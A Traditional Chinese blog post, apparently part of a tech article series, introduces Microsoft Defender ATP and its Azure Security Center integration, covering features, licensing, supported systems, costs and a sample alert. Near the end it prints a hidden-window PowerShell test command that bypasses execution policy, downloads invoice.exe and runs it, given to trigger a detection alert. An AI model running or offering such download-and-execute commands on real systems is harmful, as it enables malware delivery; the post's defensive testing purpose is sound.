前言回顧
技能解封中間章程-庇護所疫軍之亂(Azure Anti-malware)
已領取技能符石
解封技能樹(Start)
適合的勇者?
曾經遭逢資安事件打擊者。
資安事件觀望者。
資安探索者。
IT過路人。
資安潛水幫。
資安擺渡人。*
學完可以帶走甚麼?
種下資安的芽在自己心中讓資安意識更強大。
自己的資安生涯規劃師。
帶走心中的這棵樹,把樹傳出去。
你也可以是小小資安擺渡人。
單挑資安認證更有信心。
奧莉爾 vs 墨菲斯托
隱形偵查,小兵立大功
御林軍總是如鐵血部隊般金剛不敗,可謂戰場上的鐵血常勝軍,但要有這樣一次次的屢戰屢勝可不只是肉搏戰的偶然,原來從踏進成為軍團的一份子,就是誓死效忠,一雙正常的眼必須殘酷的將左眼改造(擁有一支能探測空間狀態中是敵是友判讀其來歷意圖而做出預判行為讓每次的格鬥都是精準的)但這都是拜注入極地暗黑蝙蝠之血所賜。回到人類聽得懂的代名詞"進階威脅防禦"小弟先簡述一下此服務究竟為何?
Microsoft Defender ATP 進階威脅防禦本身是一套用來進行預策性偵防、自動化調查的整合平台。本身 Defender 同時也支援對資訊安全中心做整合讓 Azure 上的機器服務均能受到保護讓功能有更多優化。另外也可找出異常情況。 以降低各伺服器間受到更多樣化的攻擊。
Microsoft Defender ATP 主要功能:
- 先進入侵偵測感應:透過已安裝在 Windows 主機內的 Defender ATP Sensor 來收集大量的行為資料。
- 雲端架構作分析偵測:快速適應不斷變化的威脅使用進階分析與巨量資料讓 Windows、Azure 這些保護標的透過Intelligent Security Graph 來偵測不明威脅。
- 威脅情報:當 Defender ATP 識別攻擊者的程式工具技術時會產生警示。由 Microsoft 威脅獵人和資安小組提供資料,讓合作夥伴的情報更為強大。
Defender 試用連結網址:
之前已經有作申請不過都需要等待審核
這是鐵人賽的第二次再次發送申請(又是七個工作天內)
這是針對此 Defender ATP 的評估設置官方圖文,可以先行參閱
Evaluation Lab setup
**Microsoft Defender ATP 所需授權類型如下: **
- Windows 10 Enterprise E5
- Windows 10 Education E5
- Microsoft 365 E5 (M365 E5) which includes Windows 10 Enterprise E5
- Microsoft 365 E3 (M365 E3) with Identity and Threat Protection package
搭配資訊安全中心威脅偵測所需的Azure 成本計算方式如下:
基本版 vs 標準版
換算用滿一個月費用是NT$438.792/伺服器/月,內含資料 - 500 MB/天
目前支援存取 Microsoft Defender ATP 的瀏覽器如下(真的頗少):
- Microsoft Edge
- Internet Explorer 11
- Google Chrome
能支援納管的 Windows 版本需求:
- Windows 7 SP1 企業/專業版
- Windows 8.1 企業/專業版
- Windows 10 企業/專業/教育版 (1607 版本號含以上)
- Windows Server 2008 R2 SP1
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
PS:目前尚不支援在行動裝置上的 Windows 電腦
其他作業系統支援類型:
Microsoft Defender Advanced Threat Protection for Mac 為例
要讓 Defender ATP 防護最新有以下兩種方式:
- 保護更新-透過雲端式防護,須能直接連上Internet定期 (預設一天一次,可以自訂頻率)下載安全性情報更新。
- 產品更新-如像 Windows 10 每月隨 Windows 10 版本做平台更新又或是熟知一般 WSUS、CCM、Windows Update 來做更新。
資訊安全中心搭配提供之主要功能:
- 自動上架:Defender ATP Sensor 會為 Azure 資訊安全中心的 Windows 主機自動上架啟用。
- 統一警示介面:資訊安全中心主控台會顯示 Defender ATP 所產生的警示。
- 詳細主機調查:資訊安全中心可以透過 Defender ATP 的 Console 可以根據事件進行更多深入調查找出問題範圍。
資訊安全中心與 Defender ATP 啟用整合
Azure 資訊安全中心本身會自動將所能支援的主機自動上架至 Defender ATP。最多可能需要約 24hr 的時間。
我這邊示範針對所有事件(做到滴水不露)來啟用自動佈建偵測的動作
以下圖被偵測到異常攻擊以下為長條統計圖總覽
而 9/26 疑似被不知名具有風險性的IP 攻擊
最後針對此台主機做出相對應的建議:
- Enforce the use of strong passwords and do not re-use them across multiple resources and services
- In case this is an Azure Virtual Machine - set up an NSG allow list of only expected IP addresses or ranges
- In case this is an Azure Virtual Machine - lock down access to it using network JIT
平台服務支援清單
資訊安全中心中 Defender ATP 原生支援標準層級中的訂閱帳戶內主機服務如:
- Windows Server 2008 R2 SP1
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
補充無法直接讓 Defender ATP 對外那就需要一個 Proxy 服務當作與Azure中間的橋樑,而少數極為嚴謹的公司提供以下URL來進行放行,除此之外視需求進行阻擋。
警示 PowerShell 測試執行範例
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).
DownloadFile http://127.0.0.1/invoice.exe
C:\garylab\invoice.exe'); Start-Process 'C:\garylab\invoice.exe'
上屆鐵人主題
如果有興趣對您有幫助也請多多支持,歡迎給小弟建議或互相交流!